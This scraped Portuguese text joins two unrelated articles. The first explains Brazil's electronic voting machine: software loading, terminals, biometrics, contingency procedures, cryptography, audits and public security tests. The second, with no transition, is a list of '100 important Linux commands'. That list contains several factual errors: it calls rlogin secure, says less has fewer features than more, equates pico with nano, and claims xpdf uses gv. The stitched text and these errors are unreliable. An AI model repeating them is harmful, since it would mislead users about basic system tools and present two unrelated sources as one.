Existem dois importantes sistemas relacionados à urna eletrônica, que são utilizados nos computadores da  justiça  Eleitoral.  São  eles:  o  Subsistema de  Instalação  –  SIS  e  o  Segurança Gerenciador de Dados e Aplicativos da Urna Eletrônica – GEDAI. O SIS tem por sua vez a grande função de  controlar  o  acesso.  Este  sistema  permite a  criação  de  um  trabalho  homogêneo e  seguro possibilitando o controle do processo de inseminação de informações nas urnas e, também, garante que sistemas eleitorais, como o GEDAI, somente sejam instalados nos equipamentos da Justiça Eleitoral.

Já o GEDAI é o sistema responsável por transferir dados, das seções eleitorais como a tabela de eleitores de cada seção, fotos dos candidatos, bem como o Sistema Operacional UE-nux (Linux da urna) entre outros, que são transferidos para um flash card (Memória Flash – figura abaixo) de carga e futuramente inseridos nas urnas eletrônicas. É ainda o GEDAI o programa responsável pela gravação das  memórias de  resultados  que  introduzem na Urna todos os programas utilizados durante as eleições.

O sistema como um todo tem início com a compilação   do   código-fonte.   Uma   equipe   de técnicos do TSE insere as chaves e as rotinas criptográficas. Encerrada a compilação dos programas tem início a  preparação dos  pacotes, que contém todos os programas utilizados na urna eletrônica. Estes pacotes são cifrados e enviados aos Tribunais Regionais Eleitorais juntamente com o cadastro nacional de todos os eleitores.

A última etapa percorrida pelo software para chegar à urna eletrônica é feita por meio do flash card. No processo de inseminação de informações o flash card de carga é inserido no slot de flash externo e a urna é ligada. A inicialização da urna é feita a partir do flash card externo e é seguida da execução de programas que formatam o flash card interno e copiam os arquivos de aplicação, os arquivos do sistema operacional e os arquivos de controle. A urna é então desligada e o flash card de carga é substituído pelo flash card de votação e juntamente a esse flash é inserida uma memória de resultado de votação e a urna é ligada novamente.

São realizados então, vários procedimentos de verificação de integridade do hardware e do software.

Não sendo encontrados problemas, a urna é desligada, lacrada e está pronta para ser utilizada no dia da votação!

Segundo turno

Para o segundo turno de uma eleição não é dada nova carga na urna. O programa aplicativo é o mesmo utilizado no primeiro turno da eleição, sendo necessário apenas informar a nova lista de candidatos. A preparação da urna é feita apenas através de uma nova memória de resultado específica que contém as informações dos candidatos que concorrem ao segundo turno.

Todas as urnas eletrônicas utilizam o mesmo programa de votação. O que difere uma urna da outra são os dados nelas inseridos, tais como:

  • designação do município, zona e seção eleitoral;
  • tabelas de partidos e candidatos que disputam a eleição em tal seção eleitoral;
  • tabelas de eleitores da seção;
  • fotos dos candidatos.

 O terminal do mesário e o terminal do eleitor

Dois terminais compõem a urna: o terminal do mesário, no qual o eleitor é identificado e autorizado a votar. Observando-se que nos modelos de urna a partir de 2009, a identidade pode ser verificada por meio da biometria. E o terminal do eleitor, onde o voto é registrado numericamente.

O terminal do mesário é posicionado próximo ao presidente da mesa, sendo constituído por um teclado numérico que vai do 0 ao 9, as teclas “confirma”  e  “corrige”,  um  visor  de  cristal líquido e as teclas de sinalização que indicam quando a urna está sendo alimentada por energia externa ou interna, além de indicar ainda se a urna está sendo utilizada por algum eleitor ou se ela já está liberada para o próximo. É   ainda   no   terminal   do   mesário   que   o presidente da seção eleitoral digita o número do título de eleitor e, confirmada a sua identidade, o autoriza a votar. Nas seções onde há identificação biométrica, antes da habilitação, o eleitor tem sua identidade validada pela urna, dessa forma, um eleitor não pode votar por outro.

O presidente da mesa também digita a senha de encerramento da votação no terminal do mesário.

Quando a senha de encerramento é confirmada, o terminal do eleitor imprime, automaticamente, a 1ª via do Boletim de Urna (B.U.) Se a impressão estiver correta, o presidente da mesa aperta a tecla “confirma” no terminal do eleitor e, enquanto são emitidas as outras quatro vias obrigatórias do B.U., os dados da votação são gravados na memória de resultado que servirá para a exportação dos dados daquela seção.

No terminal do eleitor encontra-se a tela de cristal líquido, onde são visualizadas as instruções para o eleitor, bem como durante a votação, o nome, número, partido e foto do candidato escolhido. Também encontramos no terminal do eleitor um teclado numérico com teclas de 0 a 9, além das teclas “branco”, “corrige” e “confirma”.

Três pequenos sinais visuais (Ieds) auxiliam o mesário, informando-o se o terminal está disponível para o eleitor, se já completou seu voto e se a urna eletrônica está funcionando ligada à corrente elétrica ou à bateria interna.

Já o terminal do eleitor possui teclado numérico, onde é registrado o voto, e uma tela de cristal líquido, onde são registradas as mensagens que orientam o eleitor para o registro de seu voto.

 

A urna funciona ligada à rede de energia elétrica, seja ela 110V ou 220V. Se faltar energia no dia da eleição, cada urna possui uma bateria interna com capacidade para funcionamento de 12 horas.

E se ainda não for suficiente, a urna poderá ser ligada a uma bateria de carro!

Outros dispositivos da urna eletrônica

Além do teclado e do monitor de vídeo, a urna também possui:

  • uma impressora, utilizada para imprimir os boletins de urna;
  • um drive para Memória de Resultado;
  • dois slots para inserção de cartão de memória do tipo flash, que são denominadas de flash interna e flash externa;
  • um conector para teclado;
  • dois conectores USB;
  • um conector para fone de ouvido, usado por eleitores com deficiência visual;
  • um conector para conexão com outros terminais de eleitor e um conector para impressora (estes dois estão instalados no microcomputador utilizado pelos mesários).

Biometria

A palavra biometria vem do grego: bios (vida) e metron (medida). Designa um método automático de reconhecimento individual baseado em medidas biológicas (anatômicas e fisiológicas) e características comportamentais.

As biometrias mais implementadas, ou estudadas, incluem as impressões digitais, reconhecimento de face, íris, assinatura e até a geometria das mãos. Porém, muitas outras modalidades estão em diferentes estágios de desenvolvimento e estudos. As impressões digitais, por exemplo, vêm sendo usadas por mais de um século, enquanto a íris é objeto de estudo há pouco mais de uma década. Não existe ainda uma modalidade biométrica que se aplique em todas as situações.

Muitos fatores devem ser levados em conta para se  implantar um sistema biométrico, tais como localização, riscos de segurança e número de usuários, entre outros.

Todo sistema biométrico é preparado para reconhecer,  verificar ou  identificar uma pessoa que foi previamente cadastrada.

Na biometria, o procedimento de verificação ocorre quando o sistema confirma uma possível identidade comparando apenas parte da informação com o todo disponível. Já o processo de  identificação  confirma a  identidade  de  um indivíduo, comparando o dado fornecido com todo o banco de dados registrado.

A biometria é usada em inúmeros lugares para melhorar a segurança ou conveniência dos cidadãos. No Brasil, a emissão de passaporte, de carteiras de identidade e o cadastro das Polícias Civil e Federal contam com sistemas biométricos.

Além disso, muitas empresas adotam tais sistemas para acesso às suas instalações ou utilização de seus serviços. É o caso de algumas academias de ginástica que usam a leitura da impressão digital para controlar o acesso dos seus frequentadores.

Para o reconhecimento individual são coletados dados biométricos por meio de sensores que os colocam em formato digital. Quanto melhor a qualidade do sensor, melhor será o reconhecimento alcançado. No  caso do cadastramento que será efetuado pela Justiça Eleitoral, os  dados serão coletados por um scanner de alta definição.

Votação em urna com leitor biométrico

Com a adoção da nova tecnologia de identificação por meio dos dados biométricos os eleitores mal notaram as mudanças na hora de votar.  Isso  porque  a  urna  com leitor biométrico informatizou um procedimento operacional: a liberação das urnas não mais é feita pelos  mesários, mas sim pela leitura das  impressões digitais do próprio eleitor. É a tecnologia a serviço da segurança do voto e da lisura do processo eleitoral.

Produtos gerados pela urna

A urna eletrônica somente grava a indicação de que o eleitor já votou. Pelo embaralhamento interno e outros mecanismos de segurança, não há nenhuma possibilidade de se verificar em quais candidatos um eleitor votou, em respeito à Constituição Federal brasileira, que determina o sigilo do voto.

Após o encerramento da votação, são gravados na Memória de Resultado da urna eletrônica os seguintes arquivos:

  1. a) Boletim de urna;
  1. b) Registro digital do voto;
  1. c) Eleitores faltosos;
  1. d) Justificativas eleitorais;
  1. e) Registro de eventos (Log).

 

Todos os arquivos são assinados digitalmente. O Boletim de urna e o registro digital do voto, além de assinados, são criptografados.

Contingências

Caso ocorra algum problema com a urna eletrônica durante a votação, serão adotados procedimentos de contingência para saná-lo.

Procedimentos de contingência: a Justiça Eleitoral prevê a adoção de procedimentos que visam sanar problemas apresentados na urna eletrônica durante a votação, apuração ou ainda falhas operacionais cometidas pelos mesários. Esses procedimentos são conhecidos como contingências de Votação e Apuração e nem sempre são capazes de resolver todas as situações. Por isso, existe a possibilidade de se ter votação totalmente manual (com a utilização de cédulas e urna convencional) ou votação mista (parte eletrônica e parte manual).

Contingências de votação: esses procedimentos utilizam urnas e flash cards previamente preparados para esse fim e, em último caso cédulas de votação em papel.

Urna de Contingência: na fase de preparação das urnas, na audiência de carga e lacre, algumas são preparadas para essa finalidade, são as “urnas de contingência”. Essas urnas são utilizadas para substituir aquelas que apresentarem defeitos durante a votação. No ato da substituição o flash card e a memória de resultado de votação são transferidos da urna com defeito para esta urna, havendo dessa forma uma migração dos votos já registrados para a urna de contingência que é lacrada e passa a ser a urna da seção.

Flash de Contingência: este procedimento é utilizado quando o procedimento de urna de contingência foi utilizado, mas não resolveu o problema. Consiste na utilização de um flash previamente preparado para essa função, no processo de geração de mídias, em substituição do flash de votação da urna que apresentou problemas. Após a troca, a urna é novamente lacrada.

Votação manual: na  situação  em  que  tanto a  adoção  da  urna  de  contingência e  do  flash  de contingência não consigam sanar o problema não resta alternativa a não ser a utilização da votação manual (por cédulas).

Encerrar Votação na Junta Eleitoral: este procedimento é utilizado para encerrar a votação quando por falha operacional, o mesário desligou a urna sem executar a rotina de encerramento da votação.

Recuperar Dados Para a Totalização: Este procedimento de contingência é utilizado quando não foi possível a leitura da mídia gerada na urna eletrônica para o totalizador ou quando o dado lido foi rejeitado na fase de processamento de boletim de urna no totalizador. Nessa situação o sistema recuperador de dados (RED) gera uma nova memória de resultado a partir da urna originária.

Recuperar Dados Para o Sistema de Apuração (SA): Este procedimento é utilizado para recuperar dados parciais (votos lançados na urna eletrônica) em caso de votação mista, para posterior computação desses votos com aqueles registrados em cédulas, no Sistema de Apuração.

Vantagens do uso da urna eletrônica

A urna eletrônica detém uma série de vantagens. A principal delas, sem dúvida, é impedir fraudes. Além disso, pode-se citar:

  • Os partidos concorrentes ao pleito recebem, previamente, os programas de computador que serão utilizados, podendo, inclusive, constituir sistema próprio de fiscalização, apuração e totalização dos resultados. Alem disso, fiscais e delegados de partidos podem acompanhar o procedimento de geração do flash card de carga e do flash card de votação.
  • Às 7h30min do dia da eleição, o presidente da mesa receptora de votos emite a “zerézima” na presença dos fiscais de partidos políticos, que é um documento impresso pela urna contendo a relação de todos os concorrentes ao pleito e com zero votos para cada um, provando que não há qualquer voto registrado naquela urna.

destaque para o teclado em Braile

  • O sistema eletrônico impede que o eleitor vote mais de uma vez, pois o número do título é bloqueado após a primeira votação.
  • Com o voto  eletrônico  acaba  a  subjetividade  para  identificar a vontade do eleitor. No processo manual são as juntas apuradoras que interpretam votos que não estão claros.
  • Em cada tecla da urna, o eleitor encontrará a gravação do respectivo número em código internacional Braile. O deficiente visual que não lê em Braile poderá votar guiando-se pelo número 5, central, ressaltado no teclado através de uma pequena barra, logo abaixo do número, na própria tecla.
  • Ao encerrar-se a votação, cada urna expede o seu boletim de urna

(BU) com todos os votos já apurados, ou seja, o resultado da eleição naquela urna é imediato.

  • O eleitor pode conferir, também pela foto, o candidato em que vota.
  • O flash card é uma mídia altamente confiável e duradoura, com gravação e leitura de dados eletrônica.
  • Para quem está fora do seu domicílio eleitoral no dia da eleição, basta apresentar o Requerimento de Justificativa Eleitoral em qualquer local de votação (no mesmo horário da votação) e a ausência é justificada, na própria urna eletrônica, pelo mesário.

Segurança da Urna Eletrônica

O processo eletrônico de votação possui mecanismos imprescindíveis para assegurar sua segurança: a assinatura digital e o resumo digital.

A assinatura digital é uma técnica criptográfica para garantir que um conteúdo, no caso um arquivo digital, possa ser verificado principalmente no que se refere à sua integridade, isto é, busca garantir que  o  programa de  computador não  foi  modificado de  forma intencional ou  não  perdeu  suas características originais por falha na gravação ou leitura. Isso significa que se a assinatura digital for válida, o arquivo não foi modificado.

A assinatura  digital também é  utilizada para  assegurar  a  autenticidade do  programa, ou  seja, confirmar que o programa tem origem oficial e foi gerado pelo Tribunal Superior Eleitoral. Neste caso, somente quem assinou digitalmente pode ter gerado aquela assinatura digital.

Já o resumo digital, também chamado de resumo criptográfico ou hash, é uma técnica criptográfica que se assemelha a um dígito verificador. Dado um arquivo digital, pode-se calcular o resumo digital desse arquivo com um algoritmo público (método matemático conhecido por todos). No caso dos sistemas de urna, são calculados os hashs de todos os arquivos e esses resumos são publicados no Portal do TSE.

Assinatura digital e lacração

Onde: TSE.

Quando: Até 20 dias antes da eleição.

Quem: Partidos políticos, Ordem dos Advogados do

Brasil (OAB) e Ministério Público (MP).

O que é apresentado: A versão final dos sistemas eleitorais; Códigos-fonte e executáveis; Manuais; Documentação.

Processos:   É   efetuada   a   compilação   dos   programas   computacionais   na   presença   dos representantes, bem como a geração de resumos digitais (hashes) dos programas. É dada permissão, aos representantes, para assinar digitalmente os sistemas eleitorais, com programa próprio, para posterior verificação (resolução-TSE). Além disso, os sistemas (fontes e executáveis) são assinados digitalmente pelo  TSE,  gravados  em  mídia  não  regravável,  lacrados  e  armazenados  no  cofre. Os representantes poderão apresentar impugnação fundamentada ao TSE.

Entregas:

São entregues aos representantes dos partidos políticos, OAB e MP:

– Resumos digitais (hashes) de todos os sistemas, também publicados na Internet;

– Memória de resultado de verificação de assinatura digital para microcomputador, urna e servidor. Após a lacração, ocorrem os seguintes eventos:

– Os sistemas são distribuídos pela rede privativa da Justiça Eleitoral aos TREs;

– Os sistemas eleitorais só funcionam nos computadores da Justiça Eleitoral;

– Os sistemas são ativados por meio de senhas geradas pelo TSE.

Por uma questão de segurança, os sistemas eleitorais só funcionam nos computadores da Justiça Eleitoral.  Desta  forma, mesmo que  os  sistemas  sejam  interceptados,  não  há  possibilidade  de instalação dos arquivos em computadores externos.

Os sistemas são ativados por meio de senhas geradas pelo TSE, ou seja, além de só funcionarem em computadores da Justiça Eleitoral, é necessário ainda o uso de senha para ativação do sistema. As senhas são geradas somente pelo Tribunal Superior Eleitoral, de forma personalizada e controlada, e distribuídas para todo o Brasil.

Criptografia

A criptografia digital é um mecanismo de segurança para o funcionamento dos programas computacionais. Como os dados tornam-se “embaralhados”, eles ficam inacessíveis a pessoas não autorizadas.

O  Tribunal Superior Eleitoral usa  algoritmos de cifração simétrica e assimétrica proprietários, de conhecimento exclusivo do TSE.

O boletim de urna é criptografado de forma segmentada, assinado digitalmente e transmitido.

Além da criptografia, existe a decriptografia que é o processo pelo qual são recuperados os dados previamente criptografados, isto é, eles são “desembaralhados”. É um mecanismo de segurança para o funcionamento dos programas computacionais.

No recebimento do boletim de urna ocorrem:

– Validação da compatibilidade da chave pública de assinatura digital do boletim de urna com a chave privada do Totalizador;

– Decriptografia do boletim de urna de forma segmentada;

– Leitura do boletim de urna decriptografado;

– Armazenamento do boletim de urna criptografado e decriptografado.

Segurança em camadas

A segurança do sistema eletrônico de votação é feita em camadas. Por meio de dispositivos de segurança de tipos e com finalidades diferentes, são criadas diversas barreiras que, em conjunto, não permitem que alguém ataque o sistema como um todo. Em resumo, qualquer ataque ao sistema causa um efeito dominó e a urna eletrônica trava, não sendo possível gerar resultados válidos.

Segurança do processo

O processo eletrônico de votação possui vários mecanismos de segurança: assinatura digital, criptografia, resumo digital (hash) e a tabela de correspondência de todas as urnas utilizadas.

Auditoria

É possível realizar auditoria do processo eleitoral sob diversos aspectos, a saber:

A partir da identificação dos locais a serem auditados e da apresentação de pedido fundamentado, os seguintes procedimentos são de possível execução:

– Verificação do resumo digital (hash);

– Reimpressão do boletim de urna;

– Comparação entre o boletim impresso e o boletim recebido pelo sistema de totalização;

– Verificação de assinatura digital;

– Comparação dos relatórios e atas das seções eleitorais com os arquivos digitais da urna;

– Auditoria do código-fonte lacrado e armazenado no cofre do TSE;

– Recontagem dos votos por meio do Registro Digital do Voto (RDV);

– Comparação da recontagem do RDV com o boletim de urna.

Auditorias

Ao longo dos 12 anos de utilização do sistema informatizado de voto, várias auditorias e perícias já foram realizadas. Em 2002, a Unicamp concluiu que “o sistema eletrônico de votação atende às exigências     fundamentais     do     processo eleitoral, ou seja, o respeito à expressão do voto do eleitor e a garantia do seu sigilo”.

Em 2008, a Polícia Federal, no laudo técnico sobre  as  eleições municipais de  2008  em Caxias (MA), descartou todas as suspeitas de fraude nas urnas eletrônicas.

No mesmo ano, o TSE contratou a Fundação de  Apoio à  Capacitação em Tecnologia da Informação (FACT), com aprovação do Centro de Tecnologia da Informação Renato Archer, para a prestação de serviços especializados de suporte na especificação de programas a serem aplicados no sistema eletrônico de votação brasileiro, com foco na melhoria da segurança e na redução dos custos.

O objetivo do TSE com a contratação de especialistas é garantir à urna características ergonômicas, de interferência eletromagnética, de estabilidade e confiabilidade do hardware e de economia na compra de plataformas cada vez mais adequadas.

Testes de segurança

Com  o  objetivo  de  contribuir  para  o  aperfeiçoamento do  software e/ou  do  hardware  da  urna eletrônica, demonstrando a transparência do sistema, o TSE já realizou duas edições dos Testes Públicos de Segurança do Sistema Eletrônico de Votação, em que investigadores inscritos apresentaram e executaram planos de “ataque” aos componentes externos e internos da urna.

Em ambas oportunidades foram selecionadas, por comissão avaliadora composta por acadêmicos e cientistas, as  melhores propostas de  ataque que  puderam contribuir para  o  aprimoramento da segurança e da confiabilidade do sistema eletrônico de votação.

A primeira edição foi realizada entre 10 e 13 de novembro de 2009. Nenhum dos testes conseguiu violar a urna e os programas colocados à prova. No entanto, as ideias apresentadas pelos especialistas contribuíram para o aperfeiçoamento tecnológico da votação.

Nos testes de 2009, foram premiados os seguintes especialistas: 1º lugar – Sérgio Freitas da Silva, 2º lugar – Fernando Andrade Martins de Araújo e equipe da Controladoria-Geral da União e 3º lugar – Antonio Gil Borges de Barros e equipe da Cáritas Informática.

Sérgio, que foi premiado com R$ 5 mil, tentou violar o sigilo do voto por meio da captação de ondas eletromagnéticas emitidas pelas teclas da urna durante a digitação.

Em segundo lugar, foi premiado com R$ 3 mil o grupo de técnicos da CGU (Controladoria Geral da União), que analisou procedimentos relativos à preparação do pleito e apresentou diversas sugestões ao TSE.

Em terceiro lugar, com prêmio de R$ 2 mil, ficou a equipe da empresa Cáritas Informática, que testou tanto procedimentos de preparação do pleito quanto a urna e os softwares de votação.

Já a segunda edição dos testes foi realizada de 20 a 22 de março de 2012, sendo que os investigadores puderam participar de uma fase de preparação, na qual tiveram acesso ao código-fonte da urna eletrônica e puderam se inteirar ainda mais sobre as peculiaridades do sistema.

Os três grupos de investigadores que apresentaram as três melhores contribuições na segunda edição dos testes receberam certificados.

O  segundo  e  terceiro  colocados  não  obtiveram sucesso  nos  testes  propostos,  mas  apontaram contribuições de aprimoramento do sistema. Em segundo lugar ficou o grupo da Universidade Federal de Uberlândia, que tentou inicializar a urna com um sistema operacional diferente do desenvolvido pela Justiça Eleitoral e recuperar dados da memória da urna eletrônica por meio do uso de spray congelante.

O terceiro colocado foi o grupo do Instituto Sapientia. O desafio deste grupo era clonar um cartão de memória com os dados de votação da urna eletrônica.

Votação Paralela

A votação paralela é uma auditoria que ocorre no dia das eleições e para a qual são convidados fiscais de partidos políticos e coligações, representantes da Ordem dos Advogados do Brasil, bem como entidades representativas da sociedade. É realizada em local designado pelos tribunais regionais eleitorais, após  o  sorteio de  duas  a  quatro urnas  eletrônicas na  véspera  da  eleição. Simultaneamente à votação oficial é apresentada auditoria de verificação do funcionamento das urnas eletrônicas.

Antes da eleição, no mínimo 500 cédulas de votação são entregues aos representantes dos partidos políticos que participarão do evento e preenchidas por eles. Em seguida, as cédulas são colocadas em urnas de lona lacradas. A Comissão de Votação Paralela, instituída previamente, deve se preparar para a possibilidade de os partidos não entregarem a quantidade necessária de cédulas para o procedimento, acertando com alguma escola ou entidade o preenchimento das mesmas, já que, em hipótese alguma, as cédulas devem ser preenchidas por servidores da Justiça Eleitoral.

Simultaneamente à eleição oficial ocorre o processo de votação paralela, que funciona da seguinte forma: os participantes recolhem uma cédula da urna de lona lacrada, revelam aos fiscais e demais presentes os candidatos escolhidos e, em seguida, digitam os números correspondentes no Sistema de Apoio à Votação Paralela e na urna eletrônica. Todo o processo é fiscalizado e filmado.

A fiscalização da votação paralela ocorre por meio de:

Voto em Trânsito

Em 2010 o voto em trânsito foi implementado, possibilitando ao eleitor exercitar seu direito de voto,  mesmo não  estando  em  seu  domicílio eleitoral. Embora fique esse direito limitado às Eleições Gerais e apenas nas capitais dos Estados. Segue abaixo as resoluções de 2010 sobre o tema em questão:

Resolução TRE nº 23.215, de 02.03.2010. Dispõe sobre o voto em trânsito na eleição presidencial de 2010. Alterada pela Resolução TSE nº 23.322, de 19.8.2010.

Art. 4º Os eleitores habilitados para votar em trânsito terão seus  nomes excluídos da  urna eletrônica, passando a constar, exclusivamente, da urna das seções especialmente instaladas para este fim.

Parágrafo único. Os nomes dos eleitores habilitados em trânsito serão identificados no caderno de votação da seção de origem, com a indicação de que se habilitaram para votar em uma capital.

Art. 5º O eleitor que não comparecer à seção para votar em trânsito deverá justificar a sua ausência em qualquer Mesa  Receptora de  Justificativas, inclusive no  seu  domicílio eleitoral de  origem, à exceção da capital do Estado por ele indicada no requerimento de habilitação.

Parágrafo único. O eleitor habilitado para votar em trânsito que comparecer, no dia da votação, à sua seção eleitoral de origem será informado pelo Presidente da Mesa sobre a impossibilidade de votar e a necessidade de realizar a justificação na forma prevista no caput.

Art. 6º Caberá aos Tribunais Regionais Eleitorais cadastrar, em aplicativo desenvolvido pelo Tribunal Superior Eleitoral, as seções especiais e os locais, nas respectivas capitais dos Estados, onde serão instaladas urnas para a recepção dos votos dos eleitores em trânsito, denominadas “Mesas Receptoras de Voto em Trânsito”.

  • 1º As Mesas Receptoras de Voto em Trânsito funcionarão nos lugares designados pelos Tribunais Regionais Eleitorais, os quais deverão ser publicados até 5 de setembro de 2010, no Diário de Justiça Eletrônico.

Art. 12.  Os Tribunais Regionais Eleitorais que constituírem seções especiais para o voto em trânsito deverão  incluir  as  urnas  eletrônicas  destinadas  a  esse  fim no  quantitativo de  urnas  a  serem submetidas a sorteio para a verificação por meio de votação paralela.

Resolução TRE nº 844, de 29.7.2010. Designa a Zona Eleitoral e o local onde será instalada seção especial destinada à recepção do voto em trânsito, nas eleições de 2010 (Resolução nº 23.215/2010 do TSE).

“CONSIDERANDO que, nas eleições de 2010, os eleitores em trânsito no território nacional poderão votar, no primeiro e/ou segundo turnos, para Presidente e Vice-Presidente da República, em urnas especialmente instaladas nas  capitais dos  Estados  (Código Eleitoral, art. 233-A, e  Resolução nº

23.215/2010, art. 1º);”

“Art. 3º Caberá ao Tribunal Superior Eleitoral totalizar os votos recebidos das Mesas Receptoras de

Voto em Trânsito de todas as capitais (Resolução nº 23.215/2010, art. 11).”

Fonte: http://www.justicaeleitoral.jus.br/arquivos/tre-mg-funcionamento-urna

100 comandos importantes do Linux

 Resumo de 100 Comandos Importantes Linux

100 comandos importantes do Linux

Veja neste artigo uma lista dos comandos mais importantes do linux e uma breve explicação de cada um deles.

 

Lista de comandos mais usados do linux

  • ls: Lista todos os arquivos do diretório
  • df: Mostra a quantidade de espaço usada no disco rígido
  • top: Mostra o uso da memória
  • cd: Acessa uma determinada pasta (diretório)
  • mkdir: Cria um diretório
  • rm: Remove um arquivo/diretório
  • cat: Abre um arquivo
  • vi: Abre o editor vi(lê-se viai) para editar/criar arquivos

 

Comandos de Controle e Acesso no linux

  • exit: Terminar a sessão, ou seja, a shell (mais ajuda digitando man sh ou man csh)
  • logout: Des-logar, ou seja, terminar a sessão atual, mas apenas na C shell e na bash shell
  • passwd: Mudar a password do nosso utilizador (usuário logado)
  • rlogin: Logar de forma segura em outro sistema Unix/Linux
  • ssh: Sessão segura, vem de secure shell, e permite-nos logar num servidor remoto através do protocolo ssh
  • slogin: Versão segura do rlogin
  • yppasswd: Mudar a password do nosso utilizador nas páginas amarelas (yellow pages)

Comandos de Comunicações do linux

  • mail: Enviar e receber emails
  • mesg: Permitir ou negar mensagens de terminal e pedidos de conversação (talk requests)
  • pine: Outra forma de enviar e receber emails, uma ferramenta rápida e prática
  • talk: Falar com outros utilizadores que estejam logados no momento
  • write: Escrever para outros utilizadores que estejam logados no momento

Comandos de Ajuda e Documentação do linux

  • apropos: Localiza comandos por pesquisa de palavra-chave
  • find: Localizar arquivos, como por exemplo: find . -name *.txt -print, para pesquisa de arquivos de texto do diretório atual
  • info: Abre o explorador de informações
  • man: Manual muito completo, pesquisa informação acerca de todos os comandos que necessitemos de saber, como por exemplo man find
  • whatis: Descreve o que um determinado comando é/faz
  • whereis: Localizar a página de ajuda (man page), código fonte, ou arquivos binários, de um determinado programa

 

Comandos de Edição de Texto no linux

  • emacs: Editor de texto screen-oriented
  • pico: Editor de texto screen-oriented, também chamado de nano
  • sed: Editor de texto stream-oriented
  • vi: Editor de texto full-screen
  • vim: Editor de texto full-screen melhorado (vi improved)

 

Comandos de Gestão de Arquivos e Diretórios do linux

  • cd: Mudar de diretório atual, como por exemplo cd diretório, cd .., cd /
  • chmod: Mudar a proteção de um arquivo ou diretório, como por exemplo chmod 777, parecido com o attrib do MS-DOS
  • chown: Mudar o dono ou grupo de um arquivo ou diretório, vem de change owner
  • chgrp: Mudar o grupo de um arquivo ou diretório
  • cmp: Compara dois arquivos
  • comm: Seleciona ou rejeita linhas comuns a dois arquivos selecionados
  • cp: Copia arquivos, como o copy do MS-DOS
  • crypt: Encripta ou Descripta arquivos (apenas CCWF)
  • diff: Compara o conteúdo de dois arquivos ASCII
  • file: Determina o tipo de arquivo
  • grep: Procura um arquivo por um padrão, sendo um filtro muito útil e usado, por exemplo um cat a.txt | grep ola irá mostrar-nos apenas as linhas do arquivo a.txt que contenham a palavra “ola”
  • gzip: Comprime ou expande arquivo
  • ln: Cria um link a um arquivo
  • ls: Lista o conteúdo de uma diretório, semelhante ao comando dir no MS-DOS
  • lsof: Lista os arquivos abertos, vem de list open files
  • mkdir: Cria uma diretório, vem de make directory”
  • mv: Move ou renomeia arquivos ou diretórios
  • pwd: Mostra-nos o caminho por inteiro da diretório em que nos encontramos em dado momento, ou seja um pathname
  • quota: Mostra-nos o uso do disco e os limites
  • rm: Apaga arquivos, vem de remove, e é semelhante ao comando del no MS-DOS, é preciso ter cuidado com o comando rm * pois apaga tudo sem confirmação por defeito
  • rmdir: Apaga diretório, vem de remove directory
  • stat: Mostra o estado de um arquivo, útil para saber por exemplo a hora e data do último acesso ao mesmo
  • sync: Faz um flush aos buffers do sistema de arquivos, sincroniza os dados no disco com a memória, ou seja escreve todos os dados presentes nos buffers da memória para o disco
  • sort: Ordena, une ou compara texto, podendo ser usado para extrair informações dos arquivos de texto ou mesmo para ordenar dados de outros comandos como por exemplo listar arquivos ordenados pelo nome
  • tar: Cria ou extrai arquivos, muito usado como programa de backup ou compressão de arquivos
  • tee: Copia o input para um standard output e outros arquivos
  • tr: Traduz caracteres
  • umask: Muda as proteções de arquivos
  • uncompress: Restaura um arquivo comprimido
  • uniq: Reporta ou apaga linhas repetidas num arquivo
  • wc: Conta linhas, palavras e mesmo caracteres num arquivo

 

Exibição ou Impressão de Arquivos no linux

  • cat: Mostra o conteúdo de um arquivo, como o comando type do MD-DOS, e é muito usado também para concatenar arquivos, como por exemplo fazendo cat a.txt b.txt > c.txt” para juntar o arquivo a.txt e b.txt num único de nome c.txt
  • fold: Encurta, ou seja, faz um fold das linhas longas para caberem no dispositivo de output
  • head: Mostra as primeiras linhas de um arquivo, como por exemplo com head -10 a.txt, ou usado como filtro para mostrar apenas os primeiros x resultados de outro comando
  • lpq: Examina a spooling queue da impressora
  • lpr: Imprime um arquivo
  • lprm: Remove jobs da spooling queue da impressora
  • more: Mostra o conteúdo de um arquivo, mas apenas um ecrã de cada vez, ou mesmo output de outros comandos, como por exemplo ls | more
  • less: Funciona como o more, mas com menos features, menos características e potenciais usos
  • page: Funciona de forma parecida com o comando more, mas exibe os ecrãs de forma invertida ao comando more
  • pr: Pagina um arquivo para posterior impressão
  • tail: Funciona de forma inversa ao comando head, mostra-nos as últimas linhas de um arquivo ou mesmo do output de outro comando, quando usado como filtro
  • zcat: Mostra-nos um arquivo comprimido
  • xv: Serve para exibir, imprimir ou mesmo manipular imagens
  • gv: Exibe arquivos ps e pdf
  • xpdf: Exibe arquivos pdf, usa o gv

 

Comandos de Transferência de Arquivos no linux

  • ftp: Vem de file transfer protocol, e permite-nos, usando o protocolo de transferência de arquivos ftp, transferir arquivos entre vários hosts de uma rede, como a um servidor de ftp para enviar ou puxar arquivos
  • rsync: Sincroniza de forma rápida e flexível dados entre dois computadores
  • scp: Versão segura do rcp

 

Comandos de Notícias ou Rede do linux

  • netstat: Mostra o estado da rede
  • rsh: Um shell em outros sistemas UNIX
  • ssh: Versão segura do rsh
  • nmap: Poderoso port-scan, para visualizarmos portas abertas num dado host
  • ifconfig: Visualizar os ips da nossa máquina, entre outras funções relacionadas com ips
  • ping: Pingar um determinado host, ou seja, enviar pacotes icmp para um determinado host e medir tempos de resposta, entre outras coisas

 

Comandos de Controlo de Processos do linux

  • kill: Mata um processo, como por exemplo kill -kill 100ou kill -9 100 ou kill -9 %1
  • bg: Coloca um processo suspenso em background
  • fg: Ao contrário do comando bg, o fg traz de volta um processo ao foreground
  • jobs: Permite-nos visualizar jobs em execução, quando corremos uma aplicação em background, poderemos ver esse job com este comando, e termina-lo com um comando kill -9 %1, se for o jobnúmero 1, por exemplo
  • top: Lista os processos que mais cpu usam, útil para verificar que processos estão a provocar um uso excessivo de memória, e quanta percentagem decpu cada um usa em dado momento
  • ^y: Suspende o processo no próximo pedido de input
  • ^z: Suspende o processo actual

 

Comandos de Informação de Estado do linux

  • clock: Define a hora do processador
  • date: Exibe a data e hora
  • df: Exibe um resumo do espaço livre em disco
  • du: Exibe um resumo do uso do espaço em disco
  • env: Exibe as variáveis de ambiente
  • finger: Pesquisa informações de utilizadores
  • history: Lista os últimos comandos usados, muito útil para lembrar também de que comandos foram usados para fazer determinada acção no passado ou o que foi feito em dada altura
  • last: Indica o último login de utilizadores
  • lpq: Examina a spool queue
  • manpath: Mostra a path de procura para as páginas do comando man
  • printenv: Imprime as variáveis de ambiente
  • ps: Lista a lista de processos em execução, útil para saber o pid de um processo para o mandar abaixo com o comando kill, entre outras coisas
